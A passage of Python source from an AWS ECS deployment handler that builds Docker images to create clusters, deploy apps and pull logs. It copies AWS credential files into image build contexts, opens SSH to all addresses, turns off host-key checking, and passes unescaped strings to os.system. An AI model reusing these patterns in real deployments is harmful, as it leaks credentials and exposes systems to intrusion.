This is hard limit mem1 = common_functions.get_app_memory(app_info) if mem1: memory = int(mem1) family_name = app_info['app_name'] task_def_arn = '' revision = str(int(round(time.time() * 1000))) family_name = family_name + "-" + revision env_list = [] for key, value in env_vars_dict.iteritems(): environment_dict = {} environment_dict['name'] = key environment_dict['value'] = value env_list.append(environment_dict) if host_port != 80: env_obj = env_db.Environment().get(app_info['env_id']) env_output_config = ast.literal_eval(env_obj.output_config) sec_group_name = env_output_config['http-and-ssh-group-name'] sec_group_id = env_output_config['http-and-ssh-group-id'] vpc_id = env_output_config['vpc_id'] vpc_traffic_block = [] internet_traffic = '0.0.0.0/0' vpc_traffic_block.append(internet_traffic) port_list = [host_port] ECSHandler.awshelper.setup_security_group(vpc_id, vpc_traffic_block, sec_group_id, sec_group_name, port_list) try: resp = self.ecs_client.register_task_definition( family=family_name, containerDefinitions=[{'name': cont_name, 'image': image, 'memory': memory, 'portMappings': [{ 'containerPort': container_port, 'hostPort': host_port, 'protocol': 'tcp'}], 'environment': env_list}] ) task_def_arn = resp['taskDefinition']['taskDefinitionArn'] except Exception as e: fmlogger.error("Exception encountered in trying to register task definition:%s" % e) fmlogger.debug("Done registering task definition.") return task_def_arn, cont_name def _deregister_task_definition(self, task_def_arn): try: self.ecs_client.deregister_task_definition(taskDefinition=task_def_arn) except Exception as e: fmlogger.error("Exception encountered in deregistering task definition:%s" % e) def _get_app_url(self, app_info, cluster_name, host_port): app_url = '' self._copy_creds(app_info) df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . 
/src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \n" "RUN sudo apt-get update && sudo apt-get install -y curl \n" "RUN sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-v0.6.2 \ \n" " && chmod +x /usr/local/bin/ecs-cli \n" "ENTRYPOINT [\"ecs-cli\", \"ps\", \"--cluster\", \"{cluster_name}\"]").format(cluster_name=cluster_name) app_dir = app_info['app_location'] app_folder_name = app_info['app_folder_name'] cont_name = app_info['app_name'] + "-get-cont-ip" df_dir = app_dir + "/" + app_folder_name fp = open(df_dir + "/Dockerfile.get-cont-ip", "w") fp.write(df) fp.close() err, output = self.docker_handler.build_container_image(cont_name, df_dir + "/Dockerfile.get-cont-ip", df_context=df_dir) app_ip = '' if not err: run_err, run_output = self.docker_handler.run_container(cont_name) if not run_err: get_ip_cont_id = run_output.strip() logs_err, logs_output = self.docker_handler.get_logs(get_ip_cont_id) if not logs_err: task_name = app_info['app_name'] lines = logs_output.split("\n") for line in lines: str1 = ' '.join(line.split()) parts = str1.split(" ") if len(parts) >= 4: if parts[3].strip().find(task_name) >= 0: if parts[1].strip() == 'RUNNING': app_url_str = parts[2].strip() app_ip = app_url_str.split("->")[0].strip() app_url = "http://" + app_ip break else: app_url = "Could not get app url." 
break self.docker_handler.remove_container(get_ip_cont_id) self.docker_handler.remove_container_image(cont_name) fmlogger.debug("App URL:%s" % app_url) return app_url def _check_task(self, cluster_name, task_arn, status): status_reached = False issue_encountered = False task_desc = '' while not status_reached and not issue_encountered: try: task_desc = self.ecs_client.describe_tasks(cluster=cluster_name, tasks=[task_arn]) cont_status = task_desc['tasks'][0]['containers'][0]['lastStatus'] if cont_status.lower() == status: status_reached = True except Exception as e: fmlogger.error("Exception encountered in trying to run describe_tasks:%s" % e) issue_encountered = True return task_desc def _stop_task(self, app_id): app_obj = app_db.App().get(app_id) app_details = app_obj.output_config app_details_obj = ast.literal_eval(app_details) cluster_name = app_details_obj['cluster_name'] # TODO(devdatta): When we support multiple instances of a task then # we should revisit following logic. tasks = self.ecs_client.list_tasks(cluster=cluster_name) if 'taskArns' in tasks: task_arn = tasks['taskArns'][0] # assuming one task current try: self.ecs_client.stop_task(cluster=cluster_name, task=task_arn) except Exception as e: fmlogger.error("Exception encountered in trying to stop_task:%s" % e) self._check_task(cluster_name, task_arn, 'stopped') fmlogger.debug("Task stopped:%s" % task_arn) def _run_task(self, app_info): family_name = app_info['app_name'] env_id = app_info['env_id'] cluster_name = self._get_cluster_name(env_id) task_arn = '' try: resp = self.ecs_client.run_task(cluster=cluster_name, taskDefinition=family_name) task_arn = resp['tasks'][0]['taskArn'] except Exception as e: fmlogger.error("Exception encountered in trying to run_task:%s" % e) task_desc = self._check_task(cluster_name, task_arn, 'running') container_ip = task_desc['tasks'][0]['containers'][0]['networkBindings'][0]['bindIP'] host_port = task_desc['tasks'][0]['containers'][0]['networkBindings'][0]['hostPort'] 
fmlogger.debug("Container IP:%s" % container_ip) fmlogger.debug("Container Port:%s" % host_port) application_url = self._get_app_url(app_info, cluster_name, host_port) fmlogger.debug("Completed Running task") return application_url, task_arn, cluster_name def _get_path_for_dfs(self, app_info): app_dir = app_info['app_location'] app_folder_name = app_info['app_folder_name'] df_dir = app_dir + "/" + app_folder_name return df_dir def _copy_creds(self, app_info, provided_df_dir=''): df_dir = provided_df_dir if not df_dir: df_dir = self._get_path_for_dfs(app_info) if not os.path.exists(df_dir + "/aws-creds"): shutil.copytree(home_dir + "/.aws", df_dir + "/aws-creds") def _update_ecs_app_service(self, app_info, cont_name, task_def_arn, task_desired_count=1): cluster_name = self._get_cluster_name(app_info['env_id']) ECSHandler.awshelper.update_service(app_info['app_name'], cluster_name, task_def_arn, task_desired_count) def _check_if_app_is_ready(self, app_id, app_ip_url, app_url): app_status = '' if common_functions.is_app_ready(app_ip_url, app_id=app_id): fmlogger.debug("Application is ready.") app_status = constants.APP_DEPLOYMENT_COMPLETE + ":" + constants.APP_IP_IS_RESPONSIVE else: fmlogger.debug("Application could not start properly.") app_status = constants.APP_LB_NOT_YET_READY + ":" + constants.USE_APP_IP_URL return app_status def _create_ecs_app_service(self, app_info, cont_name, task_def_arn): env_obj = env_db.Environment().get(app_info['env_id']) env_output_config = ast.literal_eval(env_obj.output_config) subnet_string = env_output_config['subnets'] subnet_list = subnet_string.split(',') sec_group_id = env_output_config['http-and-ssh-group-id'] vpc_id = env_output_config['vpc_id'] cluster_name = self._get_cluster_name(app_info['env_id']) app_ports = common_functions.get_app_port(app_info) container_port = app_ports[0] host_port = app_ports[1] app_url, lb_arn, target_group_arn, listener_arn = ECSHandler.awshelper.create_service( app_info['app_name'], 
container_port, host_port, vpc_id, subnet_list, sec_group_id, cluster_name, task_def_arn, cont_name ) app_ip_url = self._get_app_url(app_info, cluster_name, host_port) if not app_url: app_url = app_ip_url else: app_url = "http://" + app_url fmlogger.debug("App URL:%s" % app_url) fmlogger.debug("App IP URL:%s" % app_ip_url) return app_url, app_ip_url, lb_arn, target_group_arn, listener_arn def _get_container_port(self, task_def_arn): container_port = ECSHandler.awshelper.get_container_port_from_taskdef(task_def_arn) return container_port def delete_cluster(self, env_id, env_info, resource, available_cluster_name=''): cluster_name = '' if resource: cluster_name = resource.cloud_resource_id elif available_cluster_name: cluster_name = available_cluster_name else: fmlogger.error("No cluster name given. Returning") return df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \n" "RUN sudo apt-get update && sudo apt-get install -y curl \n" "RUN sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-v0.6.2 \ \n" " && chmod +x /usr/local/bin/ecs-cli \ \n" " && ecs-cli down --cluster {cluster} --force").format(cluster=cluster_name) env_store_location = env_info['location'] fp = open(env_store_location + "/Dockerfile.delete-cluster", "w") fp.write(df) fp.close() res_id = res_db.Resource().update_res_for_env(env_id, {'status': 'deleting'}) cont_name = cluster_name + "-delete" err, output = self.docker_handler.build_container_image(cont_name, env_store_location + "/Dockerfile.delete-cluster", df_context=env_store_location) if err: fmlogger.debug("Error encountered in building container to delete cluster %s" % cluster_name) else: fmlogger.debug("Done deleting ECS cluster %s" % cluster_name) self.docker_handler.remove_container(cont_name) self.docker_handler.remove_container_image(cont_name) ec2 = boto3.resource('ec2') key_pair = ec2.KeyPair(cluster_name) try: 
key_pair.delete() except Exception as e: fmlogger.error("Error encountered in deleting key pair. %s" % e) try: self.ecs_client.delete_cluster(cluster=cluster_name) except Exception as e: fmlogger.error("Error encountered in deleting cluster %s" % e) env_obj = env_db.Environment().get(env_id) try: env_output_config = ast.literal_eval(env_obj.output_config) sec_group_name = env_output_config['http-and-ssh-group-name'] sec_group_id = env_output_config['http-and-ssh-group-id'] vpc_id = env_output_config['vpc_id'] ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e: fmlogger.error(e) res_db.Resource().delete(res_id) def _get_cluster_ips(self, cluster_name, env_store_location): cluster_instance_ip_list = [] df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \ \n" " && aws ec2 describe-instances") fp = open(env_store_location + "/Dockerfile.get-instance-ip", "w") fp.write(df) fp.flush() fp.close() get_ip_cont_image = cluster_name+"get-ip" err, output = self.docker_handler.build_container_image(get_ip_cont_image, env_store_location + "/Dockerfile.get-instance-ip", df_context=env_store_location) if err: fmlogger.error("Error encountered in building container image to get cluster IP address. 
%s " + str(err)) return output_lines = output.split('\n') json_lines = [] start = False for line in output_lines: if not start: if len(line) == 1 and line == '{': start = True json_lines.append(line) else: json_lines.append(line) for line in json_lines[::-1]: if not line == '}': del json_lines[-1] else: break json_string = '\n'.join(json_lines) json_string = re.sub('\s+', '', json_string) json_output = json.loads(json_string) reservations = json_output['Reservations'] for res_item in reservations: instances = res_item['Instances'] for instance in instances: if 'KeyName' in instance: key_name = instance['KeyName'] if key_name == cluster_name: cluster_instance_ip_list.append(instance['PublicIpAddress']) # Delete the container created for obtaining IP address self.docker_handler.remove_container_image(get_ip_cont_image) return cluster_instance_ip_list def create_cluster(self, env_id, env_info): cluster_status = 'unavailable' env_obj = env_db.Environment().get(env_id) env_name = env_obj.name env_output_config = ast.literal_eval(env_obj.output_config) env_version_stamp = env_output_config['env_version_stamp'] cluster_name = env_name + "-" + env_version_stamp keypair_name = cluster_name env_store_location = env_info['location'] if not os.path.exists(env_store_location): os.makedirs(env_store_location) shutil.copytree(home_dir + "/.aws", env_store_location + "/aws-creds") # 1) Cluster vpc details handling vpc_id = '' subnet_ids = '' try: vpc_details = ECSHandler.awshelper.get_vpc_details() except Exception as e: fmlogger.error("Error occurred when trying to get vpc details %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) vpc_id = vpc_details['vpc_id'] cidr_block = vpc_details['cidr_block'] subnet_ids = '' try: subnet_ids = ECSHandler.awshelper.get_subnet_ids(vpc_id) except Exception as e: fmlogger.error("Error occurred when trying to get subnet ids %s" + str(e)) 
error_message = 'provisioning-failed: ' + str(e) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) subnet_list = ','.join(subnet_ids) sec_group_name = cluster_name + "-http-ssh" sec_group_id = '' try: sec_group_id = ECSHandler.awshelper.create_security_group_for_vpc(vpc_id, sec_group_name) except Exception as e: fmlogger.error("Error occurred when trying to create security group for vpc %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) env_output_config['subnets'] = subnet_list env_output_config['vpc_id'] = vpc_id env_output_config['cidr_block'] = cidr_block env_output_config['http-and-ssh-group-name'] = sec_group_name env_output_config['http-and-ssh-group-id'] = sec_group_id env_update = {} env_update['status'] = env_obj.status env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) vpc_traffic_block = [] internet_traffic = '0.0.0.0/0' vpc_traffic_block.append(internet_traffic) port_list = [22, 80] try: ECSHandler.awshelper.setup_security_group(vpc_id, vpc_traffic_block, sec_group_id, sec_group_name, port_list) except Exception as e: fmlogger.error("Error occurred when trying to setup security group for vpc %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) # 2) Creating the cluster region, access_key, secret_key = ECSHandler.get_aws_details() create_keypair_cmd = ("RUN aws ec2 create-key-pair --key-name " "{key_name} --query 'KeyMaterial' --output text > {key_file}.pem").format(key_name=keypair_name, key_file=keypair_name) df = self.docker_handler.get_dockerfile_snippet("aws") 
env_details = ast.literal_eval(env_obj.env_definition) cluster_size = 1 if 'cluster_size' in env_details['environment']['app_deployment']: cluster_size = env_details['environment']['app_deployment']['cluster_size'] instance_type = 't2.micro' if 'instance_type' in env_details['environment']['app_deployment']: instance_type = env_details['environment']['app_deployment']['instance_type'] entry_point_cmd = ( "ENTRYPOINT [\"ecs-cli\", \"up\", \"--size\", \"{size}\", \"--keypair\", \"{keypair}\", \"--capability-iam\", \"--vpc\", \"{vpc_id}\", \"--subnets\", \"{subnet_list}\", " "\"--security-group\", \"{security_group}\", \"--instance-type\", \"{instance_type}\", \"--cluster\", \"{cluster}\"] \n").format( size=cluster_size, cluster=cluster_name, vpc_id=vpc_id, keypair=keypair_name, security_group=sec_group_id, subnet_list=subnet_list, instance_type=instance_type ) fmlogger.debug("Entry point cmd:%s" % entry_point_cmd) df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \n" "RUN sudo apt-get update && sudo apt-get install -y curl \n" "{create_keypair_cmd} \n" "RUN sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-v0.6.2 \ \n" " && chmod +x /usr/local/bin/ecs-cli \ \n" " && ecs-cli configure --region {reg} --cluster {cluster} \n" " {entry_point_cmd}" ).format(create_keypair_cmd=create_keypair_cmd, reg=region, cluster=cluster_name, entry_point_cmd=entry_point_cmd) fp = open(env_store_location + "/Dockerfile.create-cluster", "w") fp.write(df) fp.close() res_data = {} res_data['env_id'] = env_id res_data['cloud_resource_id'] = cluster_name res_data['type'] = 'ecs-cluster' res_data['status'] = 'provisioning' res_id = res_db.Resource().insert(res_data) err, image_id = self.docker_handler.build_container_image(cluster_name, env_store_location + "/Dockerfile.create-cluster", df_context=env_store_location) if err: error_output = common_functions.filter_error_output(image_id) error_message = 
'provisioning-failed: ' + error_output res_data['status'] = error_message res_db.Resource().update(res_id, res_data) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) env_db.Environment().update(env_id, {'output_config': error_message}) return error_message err, cont_id = self.docker_handler.run_container(cluster_name) if err: error_output = common_functions.filter_error_output(err) error_message = 'provisioning-failed: ' + error_output res_data['status'] = error_message res_db.Resource().update(res_id, res_data) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) env_db.Environment().update(env_id, {'output_config': error_message}) return error_message cont_id = cont_id.rstrip().lstrip() log_lines = [] error_found = False new_lines_found = True while new_lines_found: logs = self.docker_handler.get_logs(cont_id) new_lines_found, new_lines = common_functions.are_new_log_lines(logs, log_lines) log_lines.extend(new_lines) error_found, error_message = common_functions.is_error_in_log_lines(logs) if error_found: env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) return error_message else: status_message = ', '.join(log_lines) env_db.Environment().update(env_id, {'output_config': status_message, 'status': 'provisioning'}) fmlogger.debug("Checking status of ECS cluster %s" % cluster_name) is_active = False failures = '' while not is_active: try: clusters_dict = self.ecs_client.describe_clusters(clusters=[cluster_name]) registered_instances_count = 
clusters_dict['clusters'][0]['registeredContainerInstancesCount'] if registered_instances_count == cluster_size: is_active = True cluster_status = 'available' break # Revisit the following code. # Currently failures will never be set. We will need this only if describe_clusters ever # encounters a failure. #if 'failures' in clusters_dict: # failures = clusters_dict['failures'] # break except Exception as e: fmlogger.debug("Exception encountered in trying to describe clusters:%s" % e) time.sleep(2) res_db.Resource().update(res_id, {'status': cluster_status}) if failures: cluster_status = 'provisioning-failure' + str(failures) fmlogger.error("Failed to provision ECS cluster.") res_db.Resource().update(res_id, {'status': cluster_status}) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) return cluster_status env_output_config['cluster_name'] = cluster_name env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) env_db.Environment().update(env_id, env_update) cp_cmd = ("docker cp {cont_id}:/src/{key_file}.pem {env_dir}/.").format(cont_id=cont_id, env_dir=env_store_location, key_file=keypair_name) os.system(cp_cmd) self.docker_handler.stop_container(cluster_name) self.docker_handler.remove_container(cont_id) self.docker_handler.remove_container_image(cluster_name) env_update = {} env_output_config['key_file'] = env_store_location + "/" + keypair_name + ".pem" env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) instance_ip_list = self._get_cluster_ips(cluster_name, env_store_location) if not instance_ip_list: error_message = "Could not get Cluster instance IP. Not continuing with the request." 
fmlogger.error(error_message) env_update['status'] = error_message + " Deleting the cluster." env_db.Environment().update(env_id, env_update) self.delete_cluster(env_id, env_info, '', available_cluster_name=cluster_name) return error_message else: env_output_config['cluster_ips'] = instance_ip_list env_update['status'] = cluster_status env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) fmlogger.debug("Done creating ECS cluster %s" % cluster_name) return cluster_status def deploy_application(self, app_id, app_info): self._copy_creds(app_info) env_vars = common_functions.resolve_environment(app_id, app_info) app_details = {} app_data = {} app_details['task-familyName'] = app_info['app_name'] app_data['status'] = 'registering-task-definition' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) tagged_image = common_functions.get_image_uri(app_info) app_ports = common_functions.get_app_port(app_info) container_port = int(app_ports[0]) host_port = int(app_ports[1]) task_def_arn, cont_name = self._register_task_definition(app_info, tagged_image, container_port, host_port, env_vars) app_details['task_def_arn'] = [task_def_arn] app_details['cont_name'] = cont_name app_details['cluster_name'] = self._get_cluster_name(app_info['env_id']) app_details['image_name'] = [tagged_image] app_details['memory'] = common_functions.get_app_memory(app_info) app_details['app_folder_name'] = app_info['app_folder_name'] app_details['env_name'] = app_info['env_name'] app_details['container_port'] = container_port app_details['host_port'] = host_port app_data['status'] = 'creating-ecs-app-service' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) app_url = app_ip_url = lb_arn = target_group_arn = listener_arn = '' try: app_url, app_ip_url, lb_arn, target_group_arn, listener_arn = self._create_ecs_app_service( app_info, cont_name, task_def_arn ) except Exception as e: 
#exceptions.ECSServiceCreateTimeout as e: fmlogger.error(e) app_details['error'] = str(e) #e.get_message() app_data = {} app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) return app_details['lb_arn'] = lb_arn app_details['target_group_arn'] = target_group_arn app_details['listener_arn'] = listener_arn app_details['app_url'] = app_url app_details['app_ip_url'] = app_ip_url app_data['status'] = 'ecs-app-service-created' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) app_data['status'] = 'waiting-for-app-to-get-ready' app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) status = self._check_if_app_is_ready(app_id, app_ip_url, app_url) fmlogger.debug('Application URL:%s' % app_url) app_data['status'] = status app_data['output_config'] = str(app_details) app_db.App().update(app_id, app_data) def redeploy_application(self, app_id, app_info): self._copy_creds(app_info) #if app_info['env_id']: env_vars = common_functions.resolve_environment(app_id, app_info) app_obj = app_db.App().get(app_id) app_details = app_obj.output_config app_details_obj = ast.literal_eval(app_details) app_dt = {} app_dt['status'] = 'redeploying' app_dt['output_config'] = str(app_details_obj) app_db.App().update(app_id, app_dt) if 'memory' in app_details_obj: app_info['memory'] = app_details_obj['memory'] proxy_endpoint = app_details_obj['proxy_endpoint'] repo_name = app_details_obj['repo_name'] tag = str(int(round(time.time() * 1000))) app_dt['status'] = 'building-app-container' app_db.App().update(app_id, app_dt) err, output, image_name = self._build_app_container(app_info, repo_name, proxy_endpoint, tag=tag) if err: fmlogger.debug("Error encountered in building and tagging image. 
Not continuing with the request.") return app_dt['status'] = 'pushing-app-cont-to-ecr-repository' app_db.App().update(app_id, app_dt) tagged_image = image_name + ":" + tag err, output = self.docker_handler.push_container(tagged_image) common_functions.save_image_tag(tagged_image, app_info) if err: fmlogger.debug("Error encountered in pushing container image to ECR. Not continuing with the request.") app_dt['status'] = 'error-encountered-in-pushing-app-cont-image' app_db.App().update(app_id, app_dt) raise Exception() fmlogger.debug("Completed pushing container %s to AWS ECR" % tagged_image) current_task_def_arn = app_details_obj['task_def_arn'][-1] container_port = self._get_container_port(current_task_def_arn) host_port = 80 orig_cont_name = app_details_obj['cont_name'] app_dt['status'] = 'deregistering-current-task-ecs-app-service' app_db.App().update(app_id, app_dt) self._update_ecs_app_service(app_info, orig_cont_name, current_task_def_arn, task_desired_count=0) app_dt['status'] = 'registering-new-task-ecs-app-service' app_db.App().update(app_id, app_dt) new_task_def_arn, cont_name = self._register_task_definition(app_info, tagged_image, container_port, host_port, env_vars, cont_name=orig_cont_name) self._update_ecs_app_service(app_info, orig_cont_name, new_task_def_arn, task_desired_count=1) app_details_obj['task_def_arn'].append(new_task_def_arn) app_details_obj['image_name'].append(tagged_image) app_ip_url = app_details_obj['app_ip_url'] app_url = app_details_obj['app_url'] app_dt['status'] = 'waiting-for-app-to-get-ready' app_db.App().update(app_id, app_dt) status = self._check_if_app_is_ready(app_id, app_ip_url, app_url) app_dt['status'] = status app_db.App().update(app_id, app_dt) def delete_application(self, app_id, app_info): fmlogger.debug("Deleting Application:%s" % app_id) app_obj = app_db.App().get(app_id) try: app_details = app_obj.output_config app_details_obj = ast.literal_eval(app_details) app_details_obj['app_url'] = '' app_dt = {} 
app_dt['status'] = 'deleting' app_dt['output_config'] = str(app_details_obj) app_db.App().update(app_id, app_dt) try: task_def_arn_list = app_details_obj['task_def_arn'] latest_task_def_arn = task_def_arn_list[-1] cont_name = app_details_obj['cont_name'] self._update_ecs_app_service(app_info, cont_name, latest_task_def_arn, task_desired_count=0) for task_def_arn in task_def_arn_list: self._deregister_task_definition(task_def_arn) self.ecs_client.delete_service(cluster=app_details_obj['cluster_name'], service=app_obj.name) except Exception as e: fmlogger.error("Exception encountered in trying to delete ecs service %s" % e) ECSHandler.awshelper.delete_listener(app_details_obj) ECSHandler.awshelper.delete_target_group(app_details_obj) ECSHandler.awshelper.delete_load_balancer(app_details_obj) try: tagged_image_list = app_details_obj['image_name'] if tagged_image_list: for tagged_image in tagged_image_list: self.docker_handler.remove_container_image(tagged_image) except Exception as e: fmlogger.error("Exception encountered while deleting images %s" % e) except Exception as e: fmlogger.error("Exception encountered while deleting images %s" % e) app_db.App().delete(app_id) def _retrieve_runtime_logs(self, cluster_ip, app_name, logs_path, df_dir, pem_file_name): runtime_log = cluster_ip + constants.RUNTIME_LOG runtime_log_path = logs_path + "/" + runtime_log mkdir_command = ("mkdir {logs_path}").format(logs_path=runtime_log_path) fmlogger.debug(mkdir_command) os.system(mkdir_command) app_obj = app_db.App().get_by_name(app_name) output_config = ast.literal_eval(app_obj.output_config) tagged_images = output_config['image_name'] image = tagged_images[0] dockerlogs_sh = "dockerlogs.sh" if not os.path.exists(df_dir + "/" + dockerlogs_sh): fp = open(df_dir + "/" + dockerlogs_sh, "w") file_content = ("#!/bin/bash \n" "sudo docker ps | grep {image} | awk '{{print $1}}' | xargs docker logs \n" ).format(image=image) fp.write(file_content) fp.flush() fp.close() ssh_wrapper = 
"ssh_wrapper.sh" ssh_wrapper_path = df_dir + "/" + ssh_wrapper if not os.path.exists(ssh_wrapper_path): fp = open(ssh_wrapper_path, "w") file_content = ("#!/bin/bash \n" "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i " "/root/.ssh/{pem_file_name} ec2-user@{cluster_ip} 'bash -s' < {dockerlogs_sh}").format( pem_file_name=pem_file_name, cluster_ip=cluster_ip, dockerlogs_sh=dockerlogs_sh) fp.write(file_content) fp.flush() fp.close() change_perm_command = ("chmod +x {ssh_wrapper_path}").format(ssh_wrapper_path=ssh_wrapper_path) os.system(change_perm_command) dockerfile_name = "Dockerfile.retrieve-logs-" + runtime_log df_path = df_dir + "/" + dockerfile_name if not os.path.exists(df_path): df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN sudo apt-get install -y openssh-client \n" "RUN cp -r aws-creds $HOME/.aws \ \n" " && mkdir /root/.ssh \ \n" " && cp /src/{pem_file_name} /root/.ssh/. \ \n" " && chmod 400 /root/.ssh/{pem_file_name} \ \n" " && ./ssh_wrapper.sh" ).format(pem_file_name=pem_file_name) fp = open(df_path, "w") fp.write(df) fp.flush() fp.close() log_cont_name = ("{app_name}-{cluster_ip}-retrieve-run-logs").format(app_name=app_name, cluster_ip=cluster_ip) err, output = self.docker_handler.build_container_image(log_cont_name, df_path, df_context=df_dir) if not err: filtered_output = self.docker_handler.filter_output(output) log_output_string = '\n'.join(filtered_output) fp2 = open(runtime_log_path + "/runtime.log", "w") fp2.write(log_output_string) fp2.flush() fp2.close() self.docker_handler.remove_container_image(log_cont_name) return runtime_log_path def _retrieve_deploy_logs(self, cluster_ip, app_name, logs_path, df_dir, pem_file_name): deploy_log = cluster_ip + constants.DEPLOY_LOG deploy_log_path = logs_path + "/" + deploy_log mkdir_command = ("mkdir {logs_path}").format(logs_path=deploy_log_path) fmlogger.debug(mkdir_command) os.system(mkdir_command) logs_path_cont = '/src/' + 
deploy_log scp_cmd = ("ENTRYPOINT [\"scp\", \"-rp\", \"-o\", \"UserKnownHostsFile=/dev/null\", \"-o\", \"StrictHostKeyChecking=no\", " "\"-i\", \"/root/.ssh/{pem_file_name}\", \"ec2-user@{public_ip}:/var/log/ecs\", \"{logs_path}\" ]" ).format(pem_file_name=pem_file_name, public_ip=cluster_ip, logs_path=".") dockerfile_name = "Dockerfile.retrieve-logs-" + deploy_log df_path = df_dir + "/" + dockerfile_name if not os.path.exists(df_path): df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN sudo apt-get install -y openssh-client \n" "RUN cp -r aws-creds $HOME/.aws \ \n" " && mkdir /root/.ssh \ \n" " && cp /src/{pem_file_name} /root/.ssh/. \ \n" " && chmod 400 /root/.ssh/{pem_file_name} \n" " {scp_command}" ).format(pem_file_name=pem_file_name, scp_command=scp_cmd) fp = open(df_path, "w") fp.write(df) fp.flush() fp.close() log_cont_name = ("{app_name}-{cluster_ip}-retrieve-deploy-logs").format(app_name=app_name, cluster_ip=cluster_ip) err, output = self.docker_handler.build_container_image(log_cont_name, df_path, df_context=df_dir) if not err: run_err, run_output = self.docker_handler.run_container(log_cont_name) if not run_err: logs_cont_id = run_output.strip() time.sleep(5) # Allow time to retrieve the logs logs_cp_cmd = ("docker cp {cont_id}:{logs_path_cont} {logs_path}/").format(cont_id=logs_cont_id, logs_path_cont="/src/ecs", logs_path=deploy_log_path) fmlogger.debug(logs_cp_cmd) os.system(logs_cp_cmd) self.docker_handler.stop_container(logs_cont_id) self.docker_handler.remove_container(logs_cont_id) self.docker_handler.remove_container_image(log_cont_name) return deploy_log_path def _retrieve_logs(self, app_info): env_obj = env_db.Environment().get(app_info['env_id']) env_output_config = ast.literal_eval(env_obj.output_config) cluster_ips = env_output_config['cluster_ips'] cluster_name = env_output_config['cluster_name'] pem_file = env_output_config['key_file'] app_name = app_info['app_name'] app_location = 
app_info['app_location'] self._copy_creds(app_info, provided_df_dir=app_location) df_dir = app_location logs_path = app_info['app_location'] + "/logs" logs_path_cmd = ("mkdir {logs_path}").format(logs_path=logs_path) os.system(logs_path_cmd) pem_file_name = ("{cluster_name}.pem").format(cluster_name=cluster_name) copy_pem_file = ("cp {pem_file} {df_dir}/{pem_file_name}").format(pem_file=pem_file, df_dir=df_dir, pem_file_name=pem_file_name) fmlogger.debug(copy_pem_file) os.system(copy_pem_file) logs_path_list = [] for cluster_ip in cluster_ips: deploy_logs_path = self._retrieve_deploy_logs(cluster_ip, app_name, logs_path, df_dir, pem_file_name) runtime_logs_path = self._retrieve_runtime_logs(cluster_ip, app_name, logs_path, df_dir, pem_file_name) logs_path_list.append(deploy_logs_path) logs_path_list.append(runtime_logs_path) return logs_path_list def get_logs(self, app_id, app_info): fmlogger.debug("Retrieving logs for application %s %s" % (app_id, app_info['app_name'])) logs_path_list = self._retrieve_logs(app_info) return logs_path_list def run_command(self, env_id, env_name, resource_obj, command): fmlogger.debug("Running command against ECS cluster") if command.lower() == 'help': return ECSHandler.help_commands command_output = '' is_supported_command = self._verify(command) if not is_supported_command: command_output = ["Command not supported"] return command_output command_output = ECSHandler.awshelper.run_command(env_id, env_name, resource_obj, command) output_lines = command_output.split("\n") return output_lines
apache-2.0
ehsangolshani/crazy-hamster
.venv/lib/python3.5/site-packages/pip-9.0.1-py3.5.egg/pip/_vendor/progress/__init__.py
916
3023
